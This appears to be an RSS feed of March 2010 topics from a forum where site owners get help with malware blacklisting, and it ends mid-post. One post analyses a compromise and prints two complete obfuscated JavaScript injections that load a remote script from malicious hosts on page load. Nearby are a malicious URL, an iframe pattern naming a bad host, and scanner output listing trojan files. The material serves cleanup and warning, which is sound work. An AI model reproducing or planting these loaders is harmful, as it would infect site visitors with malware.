<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>BadwareBusters - Most recent topics</title>
    <link>http://badwarebusters.org/</link>
    <description>BadwareBusters is a community of people working together to fight back against viruses, spyware, and other bad software.</description>
    <language>en-us</language>
    <item>
      <title>Reported attack site</title>
      <description>&lt;p&gt;My site displays this warning. I&amp;#8217;ve taken all the files down and reuploaded a new index file and hardly any other files. I also downloaded all domain files to a local folder on my pc then ran it through grepWin as instructed on a different post. I did a search for:&lt;br /&gt;
&amp;lt;iframe src\s*=\s*\&amp;#8220;http:\/\/mysterio\.info\/cgi-bin\/worker\&amp;#8221; width=\&amp;#8220;1\&amp;#8221; height=\&amp;#8220;1\&amp;#8221;&amp;gt; &amp;lt;\/iframe&amp;gt;&lt;/p&gt;
&lt;p&gt;The scan did not show any virus. My site is still blacklisted. Here is a bit.ly link to my site domain:&lt;br /&gt;
http://bit.ly/aa1KoC&lt;/p&gt;
&lt;p&gt;I changed it with bit.ly so the actual domain won&amp;#8217;t show indexed in this thread as an &amp;#8220;attack site&amp;#8221; later on, by the big G&amp;#8230;&lt;/p&gt;
&lt;p&gt;Any help will be greatly appreciated. I&amp;#8217;m not asuper tech savvy computer user, but can follow some directions.&lt;/p&gt;
&lt;p&gt;Thank you,&lt;/p&gt;
&lt;p&gt;Baza&lt;br /&gt;
p.s.I&amp;#8217;m installing F-Prot now to do a scan&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (baza1955)</author>
      <pubDate>Sun, 14 Mar 2010 00:42:47 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15689</link>
      <guid>http://badwarebusters.org/main/itemview/15689</guid>
    </item>
    <item>
      <title>Pc malware injects malicious js into website index/j...</title>
      <description>&lt;p&gt;Hi all &amp;#8211; just dealt with another attack, and thought I&amp;#8217;d post it here in case it could help someone. After some research, it turns out that the owner&amp;#8217;s PC was infected with malware that was grabbing his &lt;span&gt;FTP&lt;/span&gt; info and changing files on his website.&lt;/p&gt;
&lt;p&gt;The attack clearly targeted &lt;span&gt;ANY&lt;/span&gt; files with the filename of index.html, index.htm, or index.php (I would assume other indexes would be game as well, like default.asp, but he didn&amp;#8217;t use them, so I cannot confirm.) It also targeted &lt;span&gt;ANY&lt;/span&gt; file ending in .js. This attack recursed through every directory on his site, so it created quite a lot of work to fix, as you can imagine. Although he doesn&amp;#8217;t use a lot of javascript, he uses a lot of Flash, and all of the AC_Runactivecontent.js files were affected.&lt;/p&gt;
&lt;p&gt;Interestingly, it included some Wordpress-specific file modifications, I would assume on the hopes that the infected website owner is running Wordpress. For this reason, it actuall threw me off for a minute, thinking this was a Wordpress-specfic attack. After poking around some more, it clearly wasn&amp;#8217;t. I&amp;#8217;m thinking they just tossed in some Wordpress-specific file mods on the off-chance that the infected user is running Wordpress &amp;#8211; which isn&amp;#8217;t really that unlikely, given it&amp;#8217;s popularity.&lt;/p&gt;
&lt;p&gt;Here are some samples of the code that was injected:&lt;/p&gt;
&lt;p&gt;First sample:&lt;br /&gt;
&amp;lt;scr&amp;gt;var rb=new Date();var X;if(X!=&amp;#8216;C&amp;#8217;){X=&amp;#8217;C&amp;#8217;};var Vv=new Date();function y(){this.E=&amp;#8216;&amp;#8217;;this.pX=&amp;#8217;&amp;#8216;;var r=RegExp;var G;if(G!=&amp;#8217;W&amp;#8217; &amp;amp;&amp;amp; G!=&amp;#8216;sT&amp;#8217;){G=&amp;#8217;W&amp;#8217;};var T=&amp;#8216;&amp;#8217;;var u=&amp;#8217;&amp;#8216;;var _=String(&amp;#8220;g&amp;#8221;);var F;if(F!=&amp;#8217;GJ&amp;#8217; &amp;amp;&amp;amp; F!=&amp;#8216;Y&amp;#8217;){F=&amp;#8216;&amp;#8217;};var Fs=new String();var U;if(U!=&amp;#8217;xN&amp;#8217;){U=&amp;#8217;xN&amp;#8217;};function A(p,s){var n= new String(&amp;#8220;[2eI&amp;#8221;.substr(0,1));var o_;if(o_!=&amp;#8216;j&amp;#8217;){o_=&amp;#8216;&amp;#8217;};var c;if(c!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; c!=&amp;#8216;im&amp;#8217;){c=&amp;#8217;i_&amp;#8217;};n+=s;this.Df=&amp;#8216;&amp;#8217;;n+=new String(&amp;#8220;]&amp;#8221;);var Q=new r(n, _);var ul=new String();var B;if(B!=&amp;#8217;DH&amp;#8217;){B=&amp;#8216;&amp;#8217;};return p.replace(Q, u);this.GJu=&amp;#8217;&amp;#8216;;var Ch=new Date();};var Ea=new Array();this.PN=&amp;#8217;&amp;#8216;;this.Sz=&amp;#8217;&amp;#8216;;var BF;if(BF!=&amp;#8217;&amp;#8216;){BF=&amp;#8217;da&amp;#8217;};var rD=window;var YS=new Array();var yp=&amp;#8216;&amp;#8217;;var dz;if(dz!=&amp;#8217;RM&amp;#8217;){dz=&amp;#8217;RM&amp;#8217;};var o=new String(&amp;#8220;oRW8defer&amp;#8221;.substr(4));var Tn;if(Tn!=&amp;#8216;&amp;#8217;){Tn=&amp;#8217;xW&amp;#8217;};var O=&amp;#8220;Og5src&amp;#8221;.substr(3);var Ap=&amp;#8216;&amp;#8217;;var ft=&amp;#8217;&amp;#8216;;var QW=String(&amp;#8220;scKnG&amp;#8221;.substr(0,2)&amp;lt;ins&amp;gt;&amp;#8220;mbDhribmhD&amp;#8221;.substr(4,2)&amp;lt;/ins&amp;gt;&amp;#8220;pt&amp;#8221;);var wl;if(wl!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; wl!=&amp;#8216;sz&amp;#8217;){wl=&amp;#8217;DG&amp;#8217;};var Bd;if(Bd!=&amp;#8216;tR&amp;#8217; &amp;amp;&amp;amp; Bd!=&amp;#8216;US&amp;#8217;){Bd=&amp;#8216;&amp;#8217;};var sx=new String(&amp;#8220;13V/soft&amp;#8221;.substr(3)&amp;lt;ins&amp;gt;&amp;#8220;xLFyonic.&amp;#8221;.substr(4)&amp;lt;/ins&amp;gt;&amp;#8220;com/sW81K&amp;#8221;.substr(0,5)&amp;lt;ins&amp;gt;&amp;#8220;XghoftonhXg&amp;#8221;.substr(3,5)&amp;lt;/ins&amp;gt;&amp;#8220;ic.coXGU&amp;#8221;.substr(0,5)&amp;lt;ins&amp;gt;&amp;#8220;m/goo&amp;#8221;&amp;lt;/ins&amp;gt;&amp;#8220;gle.c&amp;#8221;&amp;lt;ins&amp;gt;&amp;#8220;hkTCom/da&amp;#8221;.substr(4)&amp;lt;/ins&amp;gt;&amp;#8220;ilymavO6&amp;#8221;.substr(0,5)&amp;lt;ins&amp;gt;&amp;#8220;OIJfil.co&amp;#8221;.substr(4)&amp;lt;/ins&amp;gt;&amp;#8220;ZjPm.uk/gPjZm&amp;#8221;.substr(4,5)&amp;lt;ins&amp;gt;&amp;#8220;DYc0gpht.&amp;#8221;.substr(4)&amp;lt;/ins&amp;gt;&amp;#8220;com.p&amp;#8221;+&amp;quot;oTWhpTWo&amp;quot;.substr(3,2));var rA=&amp;quot;&amp;quot;;var Wa=&amp;quot;&amp;quot;;var z=&amp;#8217;&amp;#8216;;var l=String(&amp;#8220;httCZ1U&amp;#8221;.substr(0,3)&amp;lt;ins&amp;gt;&amp;#8220;CvQp:/&amp;#8221;.substr(3)&amp;lt;/ins&amp;gt;&amp;#8220;&lt;span&gt;ZBML&lt;/span&gt;/ho&amp;#8221;.substr(4)&amp;lt;ins&amp;gt;&amp;#8220;SOFKtliOKSF&amp;#8221;.substr(4,3)&amp;lt;/ins&amp;gt;&amp;#8220;HVNAnki&amp;#8221;.substr(4)&amp;lt;ins&amp;gt;&amp;#8220;h4onmag4nho&amp;#8221;.substr(4,3)&amp;lt;/ins&amp;gt;&amp;#8220;UYSe-c&amp;#8221;.substr(3)&amp;lt;ins&amp;gt;&amp;#8220;gcRMom.&amp;#8221;.substr(4)&amp;lt;/ins&amp;gt;&amp;#8220;MJagum&amp;#8221;.substr(3)&amp;lt;ins&amp;gt;&amp;#8220;treVboZ&amp;#8221;.substr(0,3)&amp;lt;/ins&amp;gt;&amp;#8220;7OHe.c&amp;#8221;.substr(3)&amp;lt;ins&amp;gt;&amp;#8220;om.&amp;#8221;&amp;lt;/ins&amp;gt;&amp;#8220;BHfalt&amp;#8221;.substr(3)+&amp;quot;erv&amp;quot;+&amp;quot;UQSristUrQS&amp;quot;.substr(4,3)&amp;lt;ins&amp;gt;&amp;#8220;a-o&amp;#8221;&amp;lt;/ins&amp;gt;&amp;#8220;B3bErg.E3Bb&amp;#8221;.substr(4,3)&amp;lt;ins&amp;gt;&amp;#8220;TsWLoutLTsW&amp;#8221;.substr(4,3)&amp;lt;/ins&amp;gt;&amp;#8220;eas2vbk&amp;#8221;.substr(0,3)&amp;lt;ins&amp;gt;&amp;#8220;tonRPH&amp;#8221;.substr(0,3)&amp;lt;/ins&amp;gt;&amp;#8220;linE3Pd&amp;#8221;.substr(0,3)&amp;lt;ins&amp;gt;&amp;#8220;e.r&amp;#8221;&amp;lt;/ins&amp;gt;&amp;#8220;6Bwfu:wf6B&amp;#8221;.substr(4,2));var Pm;if(Pm!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; Pm!=&amp;#8216;GP&amp;#8217;){Pm=&amp;#8217;Z&amp;#8217;};var Fv;if(Fv!=&amp;#8216;Ja&amp;#8217;){Fv=&amp;#8216;&amp;#8217;};var P=A(&amp;#8217;84424201214284224412024242&amp;#8217;,&amp;#8220;241&amp;#8221;);var Dw=&amp;#8216;&amp;#8217;;this.lj=&amp;quot;&amp;quot;;rD.onload=function(){try {var SN;if(SN!=&amp;#8217;am&amp;#8217; &amp;amp;&amp;amp; SN!=&amp;#8216;HKc&amp;#8217;){SN=&amp;#8217;am&amp;#8217;};z=l+P;var yW;if(yW!=&amp;#8216;q&amp;#8217; &amp;amp;&amp;amp; yW!=&amp;#8216;U_&amp;#8217;){yW=&amp;#8216;&amp;#8217;};var TO;if(TO!=&amp;#8217;II&amp;#8217; &amp;amp;&amp;amp; TO!=&amp;#8216;Nj&amp;#8217;){TO=&amp;#8216;&amp;#8217;};z+=sx;var xL=new Array();this.qa=&amp;quot;&amp;quot;;V=document.createElement(QW);var ml=&amp;quot;&amp;quot;;this.wlK=&amp;#8217;&amp;#8216;;V[o]=[1,5]&lt;sup&gt;&lt;a href=&quot;http://badwarebusters.org/interstitial?uri=%23fn0&quot; rel=&quot;nofollow&quot;&gt;0&lt;/a&gt;&lt;/sup&gt;;V[O]=z;var aN=new Array();var hf=&amp;quot;&amp;quot;;var PI=new Date();var Vc;if(Vc!=&amp;#8217;Nr&amp;#8217;){Vc=&amp;#8216;&amp;#8217;};document.body.appendChild(V);var HB;if(HB!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; HB!=&amp;#8216;az&amp;#8217;){HB=&amp;#8217;Go&amp;#8217;};var Ca;if(Ca!=&amp;#8216;&amp;#8217; &amp;amp;&amp;amp; Ca!=&amp;#8217;MT&amp;#8217;){Ca=&amp;#8217;cA&amp;#8217;};var ny=&amp;#8216;&amp;#8217;;} catch(u_){};var bq;if(bq!=&amp;#8217;Pc&amp;#8217;){bq=&amp;#8217;Pc&amp;#8217;};this.bd=&amp;quot;&amp;quot;;};var Qd=&amp;#8217;&amp;#8217;;};y();&amp;lt;/scr ipt&amp;gt;[spaces added]&lt;br /&gt;
&amp;lt;!--ef2b3796f01cbb36baf28b0a6140a136--&amp;gt;&lt;/p&gt;
&lt;p&gt;Second sample:&lt;/p&gt;
&amp;lt;scr&amp;gt;this.JV=&amp;#8216;&amp;#8217;;function L(){this.oJ=&amp;#8217;&amp;#8216;;var g=new Array();var l=&amp;#8217;&amp;#8216;;var Lm;if(Lm!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; Lm!=&amp;#8216;u&amp;#8217;){Lm=&amp;#8216;&amp;#8217;};this.Av=&amp;#8217;&amp;#8216;;var x=new String(&amp;#8220;9QEg&amp;#8221;.substr(3));var WE;if(WE!=&amp;#8217;&amp;#8216;){WE=&amp;#8217;k&amp;#8217;};var J=RegExp;var E;if(E!=&amp;#8216;&amp;#8217; &amp;amp;&amp;amp; E!=&amp;#8217;be&amp;#8217;){E=&amp;#8217;WC&amp;#8217;};var JQ=&amp;#8216;&amp;#8217;;function S(p,w){var V;if(V!=&amp;#8217;j&amp;#8217; &amp;amp;&amp;amp; V != &amp;#8216;&amp;#8217;){V=null};var lO=new String();var y= &amp;#8220;[&amp;#8221;;var kn=new Date();y+=w;y+=String(&amp;#8220;]&amp;#8221;);var r=new Date();var oL=new Date();var c=new J(y, x);var Q;if(Q!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; Q!=&amp;#8216;SY&amp;#8217;){Q=null};return p.replace(c, l);};var M=new Array();var XP=new Array();var qu;if(qu!=&amp;#8216;&amp;#8217; &amp;amp;&amp;amp; qu!=&amp;#8217;f&amp;#8217;){qu=null};var we=new String(&amp;#8220;defer&amp;#8221;);this.IZ=&amp;#8216;&amp;#8217;;var ft;if(ft!=&amp;#8217;WQ&amp;#8217; &amp;amp;&amp;amp; ft!=&amp;#8216;zV&amp;#8217;){ft=&amp;#8216;&amp;#8217;};var o=&amp;#8217;&amp;#8216;;var QK=new Date();var Jp=&amp;#8220;scrZeF&amp;#8221;.substr(0,3)+&amp;quot;iptDNxT&amp;quot;.substr(0,3);var _=&amp;quot;&amp;quot;;var N=new String(&amp;#8220;ZJeSsrc&amp;#8221;.substr(4));var hE;if(hE!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; hE!=&amp;#8216;sh&amp;#8217;){hE=null};var Tc;if(Tc!=&amp;#8216;&amp;#8217; &amp;amp;&amp;amp; Tc!=&amp;#8217;Yn&amp;#8217;){Tc=null};var v=S(&amp;#8216;8777323023268266377026336&amp;#8217;,&amp;#8220;7236&amp;#8221;);var WU;if(WU!=&amp;#8216;&amp;#8217;){WU=&amp;#8217;Ub&amp;#8217;};var rh=&amp;#8216;&amp;#8217;;var b=window;var A=String(&amp;quot;ht&amp;quot;+&amp;quot;gdytp&amp;quot;.substr(3)&amp;lt;ins&amp;gt;&amp;#8220;QfJ:/fJQ&amp;#8221;.substr(3,2)&amp;lt;/ins&amp;gt;&amp;#8220;phTt/s&amp;#8221;.substr(4)&amp;lt;ins&amp;gt;&amp;#8220;anw9e&amp;#8221;.substr(0,2)&amp;lt;/ins&amp;gt;&amp;#8220;ooQgW&amp;#8221;.substr(0,2)&amp;lt;ins&amp;gt;&amp;#8220;k-4fU&amp;#8221;.substr(0,2)&amp;lt;/ins&amp;gt;&amp;#8220;FdJcoFdJ&amp;#8221;.substr(3,2)&amp;lt;ins&amp;gt;&amp;#8220;jVvm.&amp;#8221;.substr(3)&amp;lt;/ins&amp;gt;&amp;quot;ad&amp;quot;+&amp;quot;ob&amp;quot;+&amp;quot;rE8e.8rE&amp;quot;.substr(3,2)+&amp;quot;co&amp;quot;+&amp;quot;m.&amp;quot;+&amp;quot;95g2ra&amp;quot;.substr(4)&amp;lt;ins&amp;gt;&amp;#8220;jkFDdi&amp;#8221;.substr(4)&amp;lt;/ins&amp;gt;&amp;quot;ka&amp;quot;+&amp;quot;Nq1bl-Nbq1&amp;quot;.substr(4,2)+&amp;quot;ru&amp;quot;+&amp;quot;.oc4Mr&amp;quot;.substr(0,2)&amp;lt;ins&amp;gt;&amp;#8220;OJ0TutJOT0&amp;#8221;.substr(4,2)&amp;lt;/ins&amp;gt;&amp;#8220;EZseasEZ&amp;#8221;.substr(3,2)+&amp;quot;st&amp;quot;+&amp;quot;onwO2s&amp;quot;.substr(0,2)&amp;lt;ins&amp;gt;&amp;#8220;D0oliDo0&amp;#8221;.substr(3,2)&amp;lt;/ins&amp;gt;&amp;#8220;ne1Yd&amp;#8221;.substr(0,2)&amp;lt;ins&amp;gt;&amp;#8220;zhe.rezh&amp;#8221;.substr(3,2)&amp;lt;/ins&amp;gt;&amp;#8220;0g4u:&amp;#8221;.substr(3));this.vP=&amp;quot;&amp;quot;;var cz;if(cz!=&amp;#8217;AJ&amp;#8217;){cz=&amp;#8216;&amp;#8217;};var pf=new String(&amp;#8220;/onetOPc&amp;#8221;.substr(0,5)&amp;lt;ins&amp;gt;&amp;#8220;T6NG.pl/oNGT6&amp;#8221;.substr(4,5)&amp;lt;/ins&amp;gt;&amp;#8220;x65Cnet.p&amp;#8221;.substr(4)&amp;lt;ins&amp;gt;&amp;#8220;PnNl/goo&amp;#8221;.substr(3)&amp;lt;/ins&amp;gt;&amp;#8220;gle.n&amp;#8221;&amp;lt;ins&amp;gt;&amp;#8220;l/goo&amp;#8221;&amp;lt;/ins&amp;gt;&amp;#8220;ZP3Xgle.cZX3P&amp;#8221;.substr(4,5)&amp;lt;ins&amp;gt;&amp;#8220;qVuMom/st&amp;#8221;.substr(4)&amp;lt;/ins&amp;gt;&amp;#8220;sY2atcou&amp;#8221;.substr(3)&amp;lt;ins&amp;gt;&amp;#8220;nter.lTUk&amp;#8221;.substr(0,5)&amp;lt;/ins&amp;gt;&amp;#8220;NsAcom.p&amp;#8221;.substr(3)+&amp;quot;WTrhp&amp;quot;.substr(3));var cN;if(cN!=&amp;#8217;oP&amp;#8217;){cN=&amp;#8217;oP&amp;#8217;};var cy=new String();var zp;if(zp!=&amp;#8216;uV&amp;#8217;){zp=&amp;#8217;uV&amp;#8217;};this.CU=&amp;#8216;&amp;#8217;;b.onload=function(){var wT=new Date();try {var lN;if(lN!=&amp;#8217;lK&amp;#8217; &amp;amp;&amp;amp; lN!=&amp;#8216;km&amp;#8217;){lN=&amp;#8217;lK&amp;#8217;};var aE=new Array();o=A+v;var CV;if(CV!=&amp;#8216;XQ&amp;#8217; &amp;amp;&amp;amp; CV!=&amp;#8216;Wl&amp;#8217;){CV=&amp;#8216;&amp;#8217;};o+=pf;var dT=new String();var Tw=&amp;quot;&amp;quot;;Z=document.createElement(Jp);var jG=new Array();Z[we]=&lt;sup&gt;&lt;a href=&quot;http://badwarebusters.org/interstitial?uri=%23fn1&quot; rel=&quot;nofollow&quot;&gt;1&lt;/a&gt;&lt;/sup&gt;&lt;sup&gt;&lt;a href=&quot;http://badwarebusters.org/interstitial?uri=%23fn0&quot; rel=&quot;nofollow&quot;&gt;0&lt;/a&gt;&lt;/sup&gt;;var IV;if(IV!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; IV!=&amp;#8216;sg&amp;#8217;){IV=&amp;#8216;&amp;#8217;};var LC=&amp;quot;&amp;quot;;Z[N]=o;var wg=new Array();var rY;if(rY!=&amp;#8217;&amp;#8217; &amp;amp;&amp;amp; rY!=&amp;#8216;XxI&amp;#8217;){rY=null};document.body.appendChild(Z);var dF=new String();var Up;if(Up!=&amp;#8216;fU&amp;#8217; &amp;amp;&amp;amp; Up!=&amp;#8216;cG&amp;#8217;){Up=&amp;#8217;fU&amp;#8217;};} catch(xH){};};};var ZV=new String();var eP;if(eP!=&amp;#8216;&amp;#8217; &amp;amp;&amp;amp; eP!=&amp;#8217;bW&amp;#8217;){eP=null};L();&amp;lt;/scr ipt&amp;gt; [spaces added]&lt;br /&gt;
&lt;br /&gt;
The malware on his PC was aggressive, updating and re-updating the files every minute or so. By analaysing the logfiles of his webserver, I found successful logins from over 140 unique IP addresses (clearly a botnet) from multiple countries, including the US, UK, Slovakia, Russia, Portugal, Sweden, Netherlands, Romania, Turkey, France, Germany, and so on &amp;#8211; all within 10 minutes or less.&lt;br /&gt;
&lt;br /&gt;
Each time the files were changed, they injected a slightly different bit of script, but each wave injected the same script into each of the index and js files. The first bit of code above was from the first wave, the second bit of code from the second wave. &lt;br /&gt;
&lt;br /&gt;
Additionally, in each wave, a different url was referenced in the malware JS. One example was cyworld-com.badjojo.com.suite101-com.outeastonline.ru:8080/evite.com/evite.com/google.com/linkwithin.com/usps.com.php&lt;br /&gt;
&lt;br /&gt;
They were so randomized, it didn&amp;#8217;t seem germaine to log them all. Each one had a familiar website (like google.com) in the url somewhere, presumably to trick the site owner into believing the code was legit.&lt;br /&gt;
&lt;br /&gt;
I had him install and run some malware scanners, and this is the result of the output. &lt;br /&gt;
&lt;br /&gt;
Memory Modules Infected:&lt;br /&gt;
C:\Users\USERNAME_REDACTED\AppData\Local\rtetls.dll (Trojan.Hiloti) &amp;#8594;&lt;br /&gt;
Delete on reboot.&lt;br /&gt;
&lt;br /&gt;
Registry Keys Infected:&lt;br /&gt;
HKEY_CURRENT_USER\&lt;span&gt;SOFTWARE&lt;/span&gt;\Microsoft\Windows\CurrentVersio&lt;br /&gt;
&lt;br /&gt;
n\Ext\Stats\{3aa42713-5c1e-48e2-b432-d8bf420dd31d}&lt;br /&gt;
(Rogue.AntiVirus2008) &amp;#8594; Quarantined and deleted successfully.&lt;br /&gt;
&lt;br /&gt;
Registry Values Infected:&lt;br /&gt;
HKEY_CURRENT_USER\&lt;span&gt;SOFTWARE&lt;/span&gt;\Microsoft\Windows\CurrentVersio&lt;br /&gt;
&lt;br /&gt;
n\Run\63322117 (Trojan.FakeAlert.H) &amp;#8594; Quarantined and deleted&lt;br /&gt;
successfully.&lt;br /&gt;
HKEY_CURRENT_USER\&lt;span&gt;SOFTWARE&lt;/span&gt;\Microsoft\Windows\CurrentVersio&lt;br /&gt;
&lt;br /&gt;
n\Run\awinonafazeqeqal (Trojan.Hiloti) &amp;#8594; Delete on reboot.&lt;br /&gt;
HKEY_CURRENT_USER\&lt;span&gt;SOFTWARE&lt;/span&gt;\Microsoft\Windows\CurrentVersio&lt;br /&gt;
&lt;br /&gt;
n\Run\hruciz (Trojan.Agent.U) &amp;#8594; Delete on reboot.&lt;br /&gt;
&lt;br /&gt;
Registry Data Items Infected:&lt;br /&gt;
(No malicious items detected)&lt;br /&gt;
&lt;br /&gt;
Folders Infected:&lt;br /&gt;
C:\ProgramData\63322117 (Rogue.Multiple) &amp;#8594; Quarantined and&lt;br /&gt;
deleted successfully.&lt;br /&gt;
&lt;br /&gt;
Files Infected:&lt;br /&gt;
C:\ProgramData\63322117\63322117.exe (Trojan.FakeAlert.H) &amp;#8594;&lt;br /&gt;
Quarantined and deleted successfully.&lt;br /&gt;
C:\Users\USERNAME_REDACTED\AppData\Local\rtetls.dll (Trojan.Hiloti) &amp;#8594;&lt;br /&gt;
Delete on reboot.&lt;br /&gt;
C:\Windows\Temp\&lt;em&gt;ex-68.exe (Rogue.SecurityTool) &amp;#8594; Quarantined&lt;br /&gt;
and deleted successfully.&lt;br /&gt;
C:\Users\USERNAME_REDACTED\AppData\Local\Temp\~TMF27F.tmp&lt;br /&gt;
(Trojan.Hiloti) &amp;#8594; Quarantined and deleted successfully.&lt;br /&gt;
C:\Users\USERNAME_REDACTED\AppData\Local\Temp\~TMF29F.tmp&lt;br /&gt;
(Trojan.Dropper) &amp;#8594; Quarantined and deleted successfully.&lt;br /&gt;
C:\Users\Scott &amp;amp;&lt;br /&gt;
Tammy\AppData\Roaming\Microsoft\Windows\Start&lt;br /&gt;
Menu\Programs\Startup\winesm32.exe (Trojan.Downloader) &amp;#8594;&lt;br /&gt;
Quarantined and deleted successfully.&lt;br /&gt;
C:\Users\USERNAME_REDACTED\Desktop\Security Tool.&lt;span&gt;LNK&lt;/span&gt;&lt;br /&gt;
(Rogue.SecurityTool) &amp;#8594; Quarantined and deleted successfully.&lt;br /&gt;
C:\Users\Scott &amp;amp;&lt;br /&gt;
Tammy\AppData\Roaming\Microsoft\Windows\Start&lt;br /&gt;
Menu\Programs\Security Tool.&lt;span&gt;LNK&lt;/span&gt; (Rogue.SecurityTool) &amp;#8594;&lt;br /&gt;
Quarantined and deleted successfully.&lt;br /&gt;
C:\Users\&lt;span&gt;USERNAME&lt;/span&gt;&lt;/em&gt;&lt;span&gt;REDACTED&lt;/span&gt;\AppData\Roaming\avdrn.dat&lt;br /&gt;
(Malware.Trace) &amp;#8594; Quarantined and deleted successfully.&lt;br /&gt;
&lt;br /&gt;
Hope that helps someone.</description>
      <author>contact@badwarebusters.org (snipe)</author>
      <pubDate>Sat, 13 Mar 2010 19:35:41 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15688</link>
      <guid>http://badwarebusters.org/main/itemview/15688</guid>
    </item>
    <item>
      <title>My sites have got to the black list stopbadware.org</title>
      <description>&lt;p&gt;My sites have got to the black list stopbadware.org! Please delete them from the black list! I have changed a hosting! Harmful programs I do not extend!&lt;br /&gt;
In Google Webmaster Tools the sites has already checked up two months ago!&lt;/p&gt;
&lt;p&gt;Here my sites which have got to the black list:&lt;br /&gt;
http://ksq.ru&lt;br /&gt;
http://nudef.com&lt;br /&gt;
http://celebsjournal.com&lt;br /&gt;
http://partner.nudeshow.ru&lt;br /&gt;
http://ksq.nudeshow.ru&lt;br /&gt;
http://nudef.nudeshow.ru&lt;br /&gt;
http://celebsjournal.nudeshow.ru&lt;/p&gt;
&lt;p&gt;Please delete them from the black list!&lt;br /&gt;
Please help I any more I do not know what to do and where to access! In google have told to help than cannot&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (ksq)</author>
      <pubDate>Sat, 13 Mar 2010 08:34:04 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15680</link>
      <guid>http://badwarebusters.org/main/itemview/15680</guid>
    </item>
    <item>
      <title>Hi,

my site http://splittingcunts.com is reported a...</title>
      <description>&lt;p&gt;Hi,&lt;/p&gt;
&lt;p&gt;My site http://splittingcunts.com is reported as attack site.&lt;br /&gt;
I really don&amp;#8217;t know what it can be. I am running a tube script from Nubiles with a trade script (TradePulse) and Google analytics. The trade script I don&amp;#8217;t use, only for tracking.&lt;/p&gt;
&lt;p&gt;Please help.&lt;/p&gt;
&lt;p&gt;Regards,&lt;br /&gt;
Jan&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (JaZo21163)</author>
      <pubDate>Sat, 13 Mar 2010 02:25:21 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15677</link>
      <guid>http://badwarebusters.org/main/itemview/15677</guid>
    </item>
    <item>
      <title>Google reports windows live profile site as malicious</title>
      <description>&lt;p&gt;I don&amp;#8217;t have the link since I closed the window, but I was just on my windows live profile clicking around when google popped up that it was a dangerous site. &lt;br /&gt;
What gives?&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (Mk1Md0)</author>
      <pubDate>Fri, 12 Mar 2010 23:37:49 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15676</link>
      <guid>http://badwarebusters.org/main/itemview/15676</guid>
    </item>
    <item>
      <title>Discussion about onlinemedicines.us</title>
      <description>&lt;p&gt;I submitted my site (www.onlinemedicines.us) in Google Webmaster Tools . And modified the pages, and uploaded the files in ftp server. The site displayed in IE in correctly, but in &lt;span&gt;FIREFOX&lt;/span&gt; again displays the Reported Attack Site!. All pages opened in IE correctly,  only problem in &lt;span&gt;FIRE&lt;/span&gt; &lt;span&gt;FOX&lt;/span&gt;. So please give me the solution for this problem.&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (srinukeerthi)</author>
      <pubDate>Fri, 12 Mar 2010 18:43:32 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15673</link>
      <guid>http://badwarebusters.org/main/itemview/15673</guid>
    </item>
    <item>
      <title>Wordpress security plugin</title>
      <description>&lt;p&gt;Wanted to let everyone here know that we&amp;#8217;ve just released a free word press plugin.&lt;/p&gt;
&lt;p&gt;WP Secure by SiteSecurityMonitor.com is a plugin that was developed as a benefit to the community for free. We developed this for our customers initially, and decided to release it to the community.&lt;/p&gt;
&lt;p&gt;It&amp;#8217;s available from the wordpress site here: http://wordpress.org/extend/plugins/wp-secure-by-sitesecuritymonitorcom/&lt;/p&gt;
&lt;p&gt;Hoping it will be at least a little helpful for some of you.&lt;/p&gt;
&lt;p&gt;Sincerely,&lt;/p&gt;
&lt;p&gt;Doug McDonald&lt;br /&gt;
SiteSecurityMonitor.com&lt;br /&gt;
doug at sitesecuritymonitor.com&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (dmcdonald)</author>
      <pubDate>Fri, 12 Mar 2010 17:27:36 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15671</link>
      <guid>http://badwarebusters.org/main/itemview/15671</guid>
    </item>
    <item>
      <title>Warning message in google won&#8217;t disappear</title>
      <description>&lt;p&gt;Hello,&lt;br /&gt;
For weeks I have the warning message on my web page www.icce.com.br and nothing I do helps removing it. I ran all suggested SW&amp;#8217;s and found some stuff which was removed. Re-uploaded my web page content and still the message is there. Please let me know what you think is still the problem and/or what I should I do next. Thanks in advance. Michael&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (michaelj)</author>
      <pubDate>Fri, 12 Mar 2010 15:12:05 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15667</link>
      <guid>http://badwarebusters.org/main/itemview/15667</guid>
    </item>
    <item>
      <title>Help! reward for help</title>
      <description>&lt;p&gt;My site www.puaforums.com has just showed up on this report&lt;/p&gt;
&lt;p&gt;Please help!&lt;/p&gt;</description>
      <author>contact@badwarebusters.org (bbelcamino)</author>
      <pubDate>Fri, 12 Mar 2010 14:15:35 -0500</pubDate>
      <link>http://badwarebusters.org/main/itemview/15662</link>
      <guid>http://badwarebusters.org/main/itemview/15662</guid>
    </item>
    <item>
      <title>Beware of iframe</title>
      <description>&lt;p&gt;I had three site that I&amp;#8217;m hosting get infected. What I found on mine is an Iframe.&lt;br /&gt;
Beware of the following code in your site. And it had infected every page in each of the sites.&lt;br /&gt;
My sites that were infected where villamontez.com; mcclendonhouse.net; and keystonecu.com&lt;br /&gt;
The following is the code that I found:&lt;br /&gt;
